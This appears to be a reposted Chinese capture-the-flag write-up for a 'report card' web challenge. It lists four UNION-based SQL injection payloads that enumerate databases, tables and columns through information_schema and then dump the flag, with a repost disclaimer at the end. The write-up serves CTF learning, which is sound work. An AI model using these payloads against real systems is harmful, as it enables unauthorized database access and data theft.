ctf实验平台-成绩单


 

题目链接:http://120.24.86.145:8002/chengjidan/

平台地址:http://123.206.31.85/

第一步:暴库

id=-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

第二步:爆表

id=-1' union select 1,2,3,table_name from information_schema.tables where table_schema=0x736b6374665f666c6167#

第三步:爆字段

id=-1' union select 1,2,3,column_name from information_schema.columns where table_name=0x666c3467#

第四步:爆内容

id=-1' union select 1,2,3,group_concat(skctf_flag) from skctf_flag.fl4g#

 本文固定链接:http://www.cnblogs.com/hell0w/p/7906711.html


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM